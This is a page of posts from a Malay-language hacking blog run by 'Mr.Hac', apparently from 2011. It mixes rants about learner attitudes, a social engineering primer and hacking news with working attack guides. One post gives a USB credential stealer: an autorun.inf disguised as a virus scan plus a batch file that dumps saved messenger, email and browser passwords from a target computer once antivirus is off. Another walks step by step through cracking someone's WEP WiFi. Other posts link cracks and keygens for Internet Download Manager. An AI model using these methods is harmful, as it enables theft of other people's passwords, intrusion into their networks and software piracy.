Utama Blog Laman 348

Sikap Yang Patut Ada Pada Seorang Hacker

0

Salam..

Ok..sebelum ni saya pernah buat entry pasal Etika Seorang Hacker. Artikel tu dah cukup lengkap. Cuma saya nak tambah nasik sikit! Sebab sejak kebelakangan ni ramai sangat yang datang ke blog ini dan tunjuk beberapa sikap yang saya tak gemar..boleh kata entri kali ni ada sikit ilmiah berbaur emosi+personal..so get ready..

Antara beberapa sikap yang Hac tak suka tu ialah:

1. Tiba-tiba bagi komen “Tak faham!” <— kadang-kadang tanda seru nak dibubuhnya sampai sepuluh!

2. Belum buat setiap langkah dah tanya macam-macam.. (?)

3. MALAS GOOGLE..

3 sikap ni memang cukup Hac benci dan tak suka..terus terang cakap..kalau anda semua belum baca entry Etika Seorang Hacker, sila BACA SEKARANG!!


Hac nak ingatkan, kepada semua yang datang sini NAK BELAJAR, tolong la..kalau tak faham, TANYA..kalau Hac tak berikan jawapan yang memuaskan, SILA GOOGLE..JANGAN MALAS GOOGLE..JANGAN!!


Tolong ikuti dan buat setiap langkah yang telah Hac tulis PENAT-PENAT tu dengan SABAR barulah bertanya apa-apa..ni tidak..belum buat apa-apa dah kata tak faham, dah tanya itu ini begitu begini..


Sikap macam ni yang anda semua tunjuk dengan Hac?? sikap macam ni yang anda semua nak tunjukkan bahawasanya ‘SAYA NAK JADI SEORANG HACKER’??
sikap macam ni tidak akan membawa anda ke mana-mana bahkan merugikan masa anda datang ke sini membaca hanya untuk membetah Mr.Hac!
Hacker kena rajin MENELAAH atau bahasa mudahnya kena rajin buat kajian sendiri..
Mr.Hac pun TAK PERNAH MASUK KELAS IT, TAK PERNAH AMBIL KURSUS HACKING..


Tapi atas kesungguhan Hac sendiri, Hac berjaya buat blog ni dan menulis di dalamnya akan ‘isi’ untuk tatapan anda semua..dan sekiranya Hac lihat perkara seperti ini masih berlaku lagi pada masa akan datang, jangan berasa terkilan jika Hac padam komen anda atau sekat IP anda daripada memberikan sebarang komen..


RAJIN-RAJINLAH buat kajian..kalau betul-betul berminat hendak mempelajari teknik, tip, trik komputer serta ilmu hacking, anda kena RAJIN! apa guna ada GOOGLE.COM kalau anda malas nak taip soalan di situ??


Apa yang penting selepas ini jangan tunjukkan sikap-sikap itu tadi..MANJA sangat!
anda tidak akan maju selagi hendak MAKAN BERSUAP dan tunggu semuanya dihidang di depan mata! biar hacker itu tahu dan kenal erti susah payah baru layak bergelar hacker biarpun taraf rendahan seperti script kiddies kerana script kiddies juga pada zahirnya orang biasa tapi RAJIN meneliti coding-coding walau adakalanya tidak faham apa pun!

Re-edit : Sebabnya aku sendiri baca pun geli. Biasa la, artikel lama, tak matang lagi dalam penulisan. Haha!

Views: 0

Iklan Newspaper Inline

Apa Itu Social Engineering?

0

Apa Itu Social Engineering?

Social Engineering (SE) bukanlah satu jenis perisian..ia adalah cara ataupun kaedah seseorang hacker (penggodam) memanipulasi kepercayaan orang lain untuk melakukan perkara yang tidak sepatutnya dilakukan olehnya atau membuat seseorang percaya untuk memberikan maklumat sulit yang diperlukan oleh hacker tersebut..secara ringkasnya SE ialah teknik permainan psikologi yang sering digunakan oleh hacker untuk mendapatkan informasi penting dari orang lain..
Kevin Mitnick ialah orang yang bertanggungjawab mempopularkan istilah SE ini..

Kesan Social Engineering:

Jika anda fikir SE sering dilakukan untuk memperdayakan orang biasa, anda salah..kerana orang seperti Kevin Mitnick berjaya memperdayakan FBI, NOKIA, MOTOROLA, dan banyak lagi mangsa/sasarannya yang lebih ‘besar’..namun bagi Mr.Hac, teknik ini juga boleh dimanupulasi oleh orang biasa dengan sedikit kemahiran penyamaran untuk memperdayakan mangsa yang kurang pengetahuan tentang IT..
tujuannya masih kekal sama, untuk mendapatkan data sulit/peribadi..

Kaedah Mengelakkan Diri Dari Menjadi Mangsa Social Engineering:

Adalah sukar sebenarnya untuk seseorang mengelakkan diri kerana telah menjadi fitrah manusia untuk mempercayai orang lain..namun terdapat sedikit tips sebagai panduan untuk mengelakkan diri kita dari menjadi mangsa:

1. Jangan sesekali berkongsi kata laluan dengan orang lain (biar siapa pun dia!)

2. Jangan buang bil kad kredit atau kad debit anda ke dalam tong sampah kerana ia mengandungi maklumat yang penting seperti nombor akaun, nombor kad dan lain-lain..jangan buang ok..terus MUSNAHKAN sahaja sekiranya tidak mahu digunakan lagi.

3. Perbaiki ilmu dan kelemahan diri anda tentang IT..

Ada banyak lagi tips tapi cukup la banyak ni..bagi banyak-banyak pun belum tentu dibaca!

P/S: Artikel ini hanya menjelaskan secara ASAS tentang Social Engineering..sekiranya anda mahukan lebih lagi info, silalah GOOGLE..terima kasih..

“Social engineering bypasses all technologies, including firewalls.” – Kevin Mitnick

“To what ever extent the companies may feel secure with latest security tools but still the human factor is the weakest vulnerability” – Kevin Mitnick

Views: 1

Iklan Newspaper Inline

Bagaimana Cara Mendapatkan Kata Laluan Yang Tersimpan Dalam Komputer?

0

Salam..Mr.Hac direct to the point je la ya..takde masa nak intro-intro ni..

Muat turun kesemua 5 tools di bawah:

MessenPass – mendapatkan kata laluan dari program Instant Messenger seperti MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger disertakan bersama Netscape 7, Trillian, Miranda, dan GAIM.

Mail PassView – mendapatkan kata laluan dari program e-mel berikut : Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Ia juga boleh mendapatkan kata laluan dari e-mel berasaskan laman web seperti Yahoomail, Gmail, Hotmail dan lain-lain..

IE Passview – mendapatkan kata laluan yang disimpan oleh Internet Explorer.

Protected Storage PassView – mendapatkan kata laluan dari Protected Storage termasuk AutoComplete dari Internet Explorer, MSN Explorer dan lain-lain.

Passwordfox – mendapatkan kata laluan dari pelayar Mozilla Firefox.

P/S: sila matikan antivirus terlebih dahulu.

1. Muat turun kesemua 5 tools diatas. Salin hanya fail executables sahaja ( fail.exe) ke dalam pendrive anda.

Contoh: Salin mspass.exe, mailpv.exe, iepv.exe, pspv.exe dan passwordfox.exe

2. Buka notepad dan salin code berikut ke dalamnya:

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

Simpan fail notepad tadi sebagai autorun.inf (pastikan extension .txt ditukarkan kepada .inf)

Simpankan fail ini ke dalam pendrive anda.

3. Buka notepad sekali lagi dan salin code berikut ke dalamnya:

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

Simpan fail notepad ini sebagai launch.bat (pastikan extension .txt ditukarkan kepada .bat)

Simpankan juga fail ini ke dalam pendrive anda.

Sekarang tools ini sudah bersedia untuk berfungsi. ikuti langkah-langkah dibawah:

1. Masukkan pendrive anda ke dalam USB port komputer sasaran anda. satu tetingkap autorun akan keluar.

2. Pada tetingkap tersebut, pilih kepada pilihan pertama – Perform a Virus Scan

3. Sekarang kesemua tools tadi akan ‘bekerja di sebalik tabir’..kesemua kata laluan akan tersimpan dalam fail .txt

4. Cabut kembali pendrive anda dan anda akan dapat lihat kata laluan yang tersimpan dalam fail .txt

5. Teknik ini hanya boleh mendapatkan kata laluan yang tersimpan dalam komputer.

Views: 2

Iklan Newspaper Inline

Internet Download Manager Patcher/Cracker For Lifetime Use!

0

Salam..yeah! Mr.Hac kembali lagi hari ni untuk berkongsi satu aplikasi ringkas yang sangat berkesan untuk crack Internet Download Manager (semua versi) supaya dapat digunakan dalam versi penuh (full version)..menarik tak?? hahaha..mestila menarik! siapa yang tak suka barang percuma kan?
mari kita tengok pratonton gambarnya!

Pernah baca tak entry Mr.Hac Kaedah Untuk Hack dan Crack Internet Download Manager Secara Manual?

Kalau belum sila baca sekarang dan lepas baca baru datang balik ke entry ini ya!
sebabnya ia ada kaitan dengan entry tersebut..kaedah hack dan crack IDM secara manual, telah dijadikan dalam bentuk perisian/aplikasi mudah supaya lepas ni kalau nak anda mahu crack/patch IDM tak perlu lagi buat secara manual..anda dapat melakukannya dengan menggunakan patcher ini..

Kalau anda mahukan keygen (key generator) sila muat turun di sini —> IDM 6.05 Key Patch

Keygen ni gunakan ketika IDM meminta butir peribadi yang baru selepas ia mengesan serial key yang palsu berada dalam IDM yang kita gunakan..

Selepas memasukkan serial key yang terhasil dari keygen itu tadi, gunakan patcher yang Mr.Hac nak berikan ini..selepas itu IDM tidak akan dapat mengesan lagi serial key palsu tersebut apabila fungsi untuk mengesannya telah dimatikan oleh patcher..
Penerangan asal, tentang cara aplikasi ini berfungsi boleh dilihat di sini..

Muat turun di sini —> IDM Crack 4 Lifetime by My Hackers Are Here

Cara Menggunakannya:

Paparan antaramukanya sangat mudah..hanya ada dua button utama iaitu Start dan Update..

Start – Untuk patch/crack IDM supaya dapat digunakan dalam versi penuh.

Update – Untuk mengemaskini versi IDM yang terbaru..selepas kemaskini, sila patch semula (klik Start)

Views: 2

Iklan Newspaper Inline

Segmen Khas ar-rifke.com | Pencarian 100 Blog Top Blogger Baru

0

Salam..akhirnya teracun juga Mr.Hac untuk menyertai segmen ini setelah terbaca di blog brader yang paling cool,abgteror..Hac pada asalnya sebelum ni memang tak pernah nak join mana-mana segmen/contest/GA sebab Hac takut orang salah label blog Hac sebagai blog biasa/sama dengan blog peribadi..but finally i said no!

Apa-apa pun para pelawat, baca aje la nohhh..

Tujuan Segmen Khas ar-rifke.com | Pencarian 100 Blog Top Blogger Baru

1) Berkenalan dengan blogger baru.
2) Merapatkan diri dengan blogger baru.
3) Memudahkan kita sesama blogger berkenalan antara satu sama lain iaitu sama ada sesama kita mahupun dengan rakan-rakan bloggers yang lain.

Soalan dari Bro Ar-Rifke, dan jawapan dari Arya Putra a.k.a Mr.Hac:

1) Berapa lama dah blogging?

Hac mula menulis/design di blog ni pada 16/01/2011..jadi kalau kira balik ada lebih kurang dekat 5 bulan juga la Hac berblogging..

2) Kenapa suka blogging?

Blog la tempat Hac nak ‘melampiaskan’ MINAT Hac yang SANGAT MENDALAM terhadap dunia IT..Hac boleh katakan ketagih tahap Dewa ke 19 dekat blog ni..kalau sehari tak buat post, sehari tak tengok blog, rasa ada tertinggal nyawa dekat ubun-ubun!

3) Blog kamu mengenai apa?

Hac buat blog ni khas untuk semua rakyat MALAYSIA tak kira bangsa untuk mempelajari ilmu-ilmu berkenaan dengan dunia IT..kalau nak ambil kelas di luar sana, Hac yakin ramai yang kurang berkemampuan..jadi apalah salah kiranya Hac bagi ‘kelas maya’ secara percuma kan? pahala tu..cuma blog Mr.Hac ni hampir 100% ditulis mengenai The Art Of Hacking..sebabnya Hac nak wujudkan kesedaran kepada semua orang akan cara kerja hackers supaya orang lain boleh ambil precaution before something bad happen..because knowledge is power..

4) Harapan dalam dunia blogging?

Hac berharap semoga semua orang, pengunjung, dan pembaca di blog Mr.Hac ni dapatlah mempelajari sedikit sebanyak mengenai dunia IT yang sangat luas ni, sama luasnya dengan dunia yang kita pijak dan langit yang kita junjung diatas kepala diantara dua jemala!

Untuk mengetahui tentang segmen ini, sila layari —> Segmen Khas ar-rifke.com | Pencarian 100 Blog Top Blogger Baru

Views: 3

Iklan Newspaper Inline

Apa Yang Diperlukan Untuk Menjadi Seorang Hacker?

0

Kerapkali persoalan ini menerjah kotak e-mail Mr.Hac (perghh..ayat..)
takde lah! haha..isu kali ni Mr.Hac bawakan untuk anda semua kerana sebelum ni Mr.Hac tengok anak-anak Melayu kita sedikit ‘manja’..nak google pun malas ke? hmmm..
susah tu..entry seterusnya Mr.Hac akan tulis serba sedikit tentang sikap-sikap seorang hacker..persoalan untuk entry kali ini ialah “Adakah saya boleh jadi seorang hacker tanpa mengetahui programming?” dan “Adakah programming itu perlu untuk menjadi seorang hacker yang sempurna?”

Apa Yang Penting Untuk Menjadi Seorang Hacker?

Pada satu waktu dahulu hacker yang terbaik adalah mereka yang menguasai ilmu-ilmu programming kerana waktu itu semuanya berpandukan kepada command line sahaja jadi sudah pasti sesiapa yang dikenali sebagai hacker adalah mereka yang pandai mengenai programming..

Bagaimanapun definisi untuk hacker berubah pada awal abad ke 21, seseorang itu dapat menjadi hacker dengan cepat tanpa mengetahui programming apabila wujudnya pelbagai tools yang telah dicipta oleh mereka yang lebih berkemahiran sehingga mereka dapat mengendalikan sesebuah komputer tanpa ilmu programming yang kompleks..ambil contoh yang paling mudah iaitu HAJIV..Hajiv ialah sejenis perisian yang membantu untuk melakukan proses SQL INJECTION secara automatik dan membantu mendapatkan maklumat sensitif dalam tempoh yang pantas dan kadangkala ia juga mengambil masa yang lama untuk kes-kes tertentu..

Di Mana Kepentingan Programming?

Kebanyakan dari hackers yang bagus sememangnya pakar dalam bab teknologi dan sentiasa ingin tahu bagaimana sesuatu proses berlaku..disinilah di mana anda perlukan ilmu programming yang mantap untuk mengetahui bagaimana proses itu berlaku..

Satu lagi sebab kenapa anda perlukan ilmu programming ialah anda akan dapat menulis exploit anda sendiri (exploit ialah kod yang digunakan untuk mendapatkan akses ke sesebuah mesin/komputer dengan pendedahan ancaman yang khusus/tertentu) dan inilah yang membezakan antara anda dan Script Kiddies dan kebanyakan masa exploit codes itu datang dengan beberapa kesalahan coding yang ‘disimpan’ oleh Elite Hackers untuk mengelakkan para Script Kiddies dan orang yang sedikit ilmu pengetahuan mengenai hacking khususnya IT daripada menjalankan exploit package tersebut..

Views: 14

Iklan Newspaper Inline

Internet Download Manager 6.05 Built 14 Including Keygen and Patch

0

Salam..rasanya ramai yang dah jatuh hati pada perisian download manager ini kan? Tak perlu rasanya Mr.Hac tulis panjang-panjang..ramai yang mengetahui betapa pantasnya perisian ini memuat turun setiap apa yang kita mahukan, dan juga umum mengetahui perisian ini cukup pantas mengemaskini versinya..

Setakat ini, Internet Download Manager sudah masuk versi 6.05 built 14..
Versi 6.06 built 2 masih dalam peringkat beta..namun anda sedah boleh mencubanya..apa yang baharu dalam Internet Download Manager 6.05 built 14?
tidak banyak pembaharuan namun terdapat beberapa bugs yang telah diperbetulkan oleh pembangun perisian yang sangat berguna ini..

Jadi, sila scroll ke bawah untuk ke pautan muat turun..

Muat turun di sini —> Internet Download Manager 6.05 built 14 With Keygen and Patch

Kaedah hack dan crack IDM —> Kaedah Untuk Hack dan Crack Internet Download Manager Secara Manual

Views: 2

Iklan Newspaper Inline

Kaedah Hack WiFi Dengan Menggunakan Beini 1.2.2

1

Salam..Mr.Hac buat tutorial Kaedah Hack WiFi Dengan Menggunakan Beini 1.2.2 ini atas permintaan yang ramai..waahhh..tutorial guna backtrack 4 tak cukup lagi ke? hmm..bagaimanapun tutorial ini dah ada dalam Forum Silent Hackers, jadi Mr.Hac rasa tak perlu nak menaip lagi, Mr.Hac ambil sahaja dari sana..kredit diberikan kepada encik ayen46 untuk artikel yang mantap ni..

Beini 1.2.1

Klik di sini untuk memuat turun

Beini 1.2.2 (Baru)

Klik di sini untuk memuat turun

Apa yang telah dikemaskini?

– Updated Aircrack-ng to 1.1r1859
– Updated FeedingBottle to 3.2: generate *.wkp file directly when get handshake packets (EWSA3.x project file)
– Added driver x_ath9k_htc_compat-wireless-2.6.38-rc4-1.tce:AR9271 chips supported
– Added firmware.tcz:updated RT3070 firmware and more
– File Manager:Removed ROX-Filer(libglade.tczl,libxml2.tczl,rox-filer_root.tcz,shared-mime-info.tcz),Added Xfe(xfe.tcz,xfe-locale.tcz,fox.tcz,Xorg-7.5-lib.tcz)

Notes: If you are not using AR9271 chips, please delete “x_ath9k_htc_compat-wireless-2.6.38-rc4-1.tce” and “firmware.tcz”, these two packets of software will cause some problems with some cards, after that please add “rt2x00_2.6.34-Beini.tce” in Beini-1.2.1 for supporting RT3070 chips. Sorry to have caused you so much inconvenience.

Nota: Burn iso tu as image kat cd (gunakan Nero, Ashampoo, Ultraiso dan lain-lain lagi)
@
Buat USB boot (gunakan UNETbootin 377)

WAJIB BACA DAN DOWNLOAD SETIAP SATU:

Support List

E-Book Tutorial – Cracking WEP Using Feeding Bottle by ayen46[PDF]

Crack WEP / WPA Using Minidwep-gtk in Beini [PDF]:[*credit to www.comfortsurf.com]

Beini USB boot video tutorial versi Melayu

UNETbootin 377 (seperti dalam video)

Run Beini @ VMware Workstation/Player Tutorial

VMware Player 3.1.4

Tutorial cara-cara mengatasi masalah USB tak boleh connect di VMware player by ayen46 [WORD]

HEXwriter- Free ASCII to HEX Converter

Tutorial Crack WEP WiFi Dengan Beini 1.2.2:
(ayat dalam tutorial ni Mr.Hac copy jadi ia bukan gaya penulisan Mr.Hac..cuma Mr.Hac ubah sikit-sikit je la..)

Mula-mula klik ikon ke-5 di bawah(lambang botol susu)

Klik yes

Klik kotak wlan0, lepas tu klik next

Klik scan

Lepas scan, kalau dah dapat pilih wireless mana yang nak hack, klik stop untuk stop scan atau dia akan stop sendiri lepas 30 saat

Klik wireless mana yang nak hack dan dia akan highlight sendiri (Contoh : Deathking). lepas tu klik next

Klik advanced mode

Klik capture, lepas tu klik fake auth (by force)

Klik access to information, klik start. tunggu sampai dia tulis Connected to (macam kat dalam gambar). lepas tu klik X untuk kotak fake authentication with AP (maksudnya tutup kotak tu)

Tick kotak Auto Run. klik Interactive 0841 (-2). tengok kotak kat kiri atas, tengok bahagian Beacons, tunggu sampai 1,000 + lebih. lepas tu klik kotak Previous (All Stop!).

Klik advance mode

Klik capture. klik fake auth (by force)

Klik access to information, klik start. tunggu sampai dia tulis Connected to (macam kat dalam gambar). kali ni tak payah tutup kotak ni.

Klik Interactive 0841 (-2). tengok kotak kat kiri atas, tengok bahagian Data, tunggu sampai 10,000 + lebih. lepas tu klik kotak start crack

Kalau dia keluar failed (gambar sebelah kanan), korang boleh tunggu dia akan run sendiri atau korang boleh klik stop crack, lepas tu klik start crack sekali lagi. saya pilih stop dulu lepas tu start balik

kalau berjaya dia akan tulis key found. angka dalam key found (…………) tu la password wifi tu tapi korang kena ambil angka je, yang nie -> : korang abaikan.

P/S: Dalam e-book tu pun dah ada penerangan ni..

Views: 26

Iklan Newspaper Inline

Facebook Hot FM Di Hack Oleh Jack Sparrow

0

Salam..nampaknya selepas TeamAryzs, giliran Facebook Hot FM pula di hack! Ramai yang bertanya sama ada benarkah FB Hot FM di hack oleh Jack Sparrow itu?
Jawapan YA! BENAR!

Hacked! Owned! Pwned! use your own words but its true..FB Hot FM yang lebih hangat dari biasa itu telah digodam oleh hacker yang menggelarkan dirinya sebagai Jack Sparrow..FB Hot FM telah digodam semalam, pada waktu pagi..mana Mr.Hac tahu? hei..ini Malaysia la..sekejap je maklumat boleh tersebar..Mr.Hac kira orang yang lambat juga la mengetahui tentang berita ini..itu pun setelah Mr.Hac melayari Forum Silent Hackers Malaysia..jadi kredit diberikan kepada mereka yang menulis berita ini..

Tujuan hack FB Hot FM dan TeamAryzs?
untuk mengetahui mengapa FB Hot FM di hack, sila baca sehingga habis entry ini..
tetapi kalau tanya kenapa FB TeamAryzs di hack, jawapan Mr.Hac adalah kerana sikap angkuh (ini berita yan Mr.Hac dapat dari sahabat Mr.Hac sendiri..siapa? jangan tanya!) dengan mengeluarkan perkataan keramat kepada encik Jack Sparrow tu..

Hackers pantang..pantang dicabar..jangan sekali-kali keluarkan perkataan keramat ini iaitu :
“Hack Us If You Can”
Anda memang menempah ‘godaman’ dari mereka, seperti yang terjadi kepada laman web 1Malaysia.com yang telah di hack oleh Team dari Devilzc0de..sebab apa? sebab ‘perkataan keramat’ tu keluar la..

Berikut adalah sedikit gambar yang diperolehi dari Silent Hackers:

Di sini Mr.Hac ingin mengatakan, Mr.Hac bukanlah menyokong tindakan mereka..tetapi, dengan terjadinya perkara seperti ini, mereka telah menunjukkan bahawa tahap PENGETAHUAN RAKYAT MALAYSIA TENTANG IT sangat-sangat-sangat LEMAH!!

bukanlah Mr.Hac katakan ia berlaku disebabkan kecuaian para DJ Hot FM, mahupun Admin TeamAryzs, tetapi jika perkara ini tidak berlaku, semua orang tak akan sedar tentang betapa pentingnya ilmu IT..apabila satu-satu FB digodam (bukan selebriti), orang akan buat tak tahu tentangnya..apabila FB selebriti yang digodam, waaah..semua mengecam! hackers tu bodoh lah, anak ha**m lah, itu ini lah..tapi bagi Mr.Hac, anda semua yang mengecam 10 kali lebih bodoh dan bingai kerana bersikap angkuh lagi bongkak..ilmu IT sangatlah penting pada zaman ini..tanpa IT, negara tidak akan maju..dan tanpa IT, rakyat akan jauh ketinggalan..kesedaran rakyat Malaysia khususnya orang Melayu terhadap IT perlu lebih dipertingkatkan lagi supaya pada masa akan datang kita semua akan lebih bersaing dan berdaya maju..

Teknik yang mereka digunakan untuk hack FB Hot FM dan TeamAryzs??

Oh..maaf..pada asalnya memang Mr.Hac dah buat draft untuk teknik tersebut..akan tetapi setelah difikirkan kembali, ia teknik yang mudah dan berkesan..jadi Mr.Hac bimbang ia akan disalahguna..

Alaaa Mr.Hac..nak tau nama teknik aje pun dah ok..apa dia Mr.Hac?

maaf ya..nama teknik pun tak dapat Mr.Hac reveal sebab nanti orang boleh google!

Jadi kepada semua, Mr.Hac harap anda belajar dari pengalaman orang lain yang dah terkena panggilan hangit…untuk kita-kita jerr..errr..Oppss!

Views: 3

Iklan Newspaper Inline

Cara Mencipta Fail Autorun.inf : Apa Itu Autorun?

0

Sebelum ni Mr.Hac pernah buat entry mengenai Autorun..namun entry itu hanyalah sekadar ‘briefing’ atau pengenalan sahaja..

Adakah Autorun itu sejenis virus?

Soalan inilah yang kerapkali ditanyakan..jawapannya, TIDAK..kenapa? mari kita tengok satu demi satu..

Berikut merupakan contoh kod yang ada dalam satu fail Autorun:

[Autorun]
Open=RECYCLERQqFvXcB.exe
Explore=RECYCLERQqFvXcB.exe
AutoPlay=RECYCLERQqFvXcB.exe
shellOpenCommand=RECYCLERQqFvXcB.exe
shellOpenDefault=1
shellExplorecommand=RECYCLERQqFvXcB.exe
shellAutoplayCommand=RECYCLERQqFvXcB.exe

Apa Itu Autorun?

Autorun ialah FAIL yang MENJALANKAN program, dokumen, atau fail yang lainnya apabila DVD, CD atau Pen Drive dimasukkan..ianya hanya sebuah FAIL..

Apabila DVD, CD atau Pendrive dimasukkan ke PC, windows akan mencari fail Autorun dan mengikuti setiap baris perintah yang terkandung dalam fail Autorun tersebut.

Bagaimana Cara Mencipta Fail Autorun.inf?

Buka Notepad dan taipkan command berikut:

[Autorun]

Simpan ia sebagai autorun.inf (sila pastikan extensionnya ditukar dari txt kepada inf)

Lengkapkan baris perintah dalam fail Autorun.inf

OPEN=

Ini akan mengkhususkan aplikasi yang perlu dibuka apabila pendrive (contohnya) dimasukkan.

Contoh:

Open:rat.exe

Ini akan menjalankan fail rat.exe apabila pendrive dimasukkan. Fail ini sepatutnya berada dalam root directory..sekira ia berada dalam directory yang berbeza, maka anda perlu menyatakannya.

Contoh:

Open=RECYCLERrat.exe

Explore=

Sama seperti biasa, sekiranya anda klik kanan pada Pendrive dan pilih Explore, maka command ini akan dijalankan.

AutoPlay=

Sama seperti di atas, ia akan menjalankan AutoPlay.

SHELLVERB=

Perintah SHELLVERB menambah perintah tambahan ke menu pintas pemacu/cakera keras. Contohnya ia boleh digunakan untuk menjalankan aplikasi pada DVD atau CD..

Contoh:

shellOpenCommand=RECYCLERQqFvXcB.exe
shellOpenDefault=1
shellExplorecommand=RECYCLERQqFvXcB.exe
shellAutoplayCommand=RECYCLERQqFvXcB.exe

Jadi mengapa perisian Antivirus saya menyekat/memadam fail Autorun?

Berdasarkan kepada contoh diatas, dapatlah kita ketahui bahawa ia bukanlah fail virus..namun ia berfungsi sebagai fail yang menjalankan aplikasi dan juga fail exe dan ini boleh membawa kepada serangan virus. sekiranya ia disekat terlebih dahulu, maka kemungkinan PC anda dijangkiti virus berkurangan.

Nak selamatkan PC dari dijangkiti?

Sila ke sini —> Aplikasi Ringkas : Safety Folder Version 1.0 dari MYHAC

Dan juga ke sini —> Safety Folder Version 1.1 (Upgraded) versi Juaratempur

Sekian..Assalamualaikum..

Views: 0

Iklan Newspaper Inline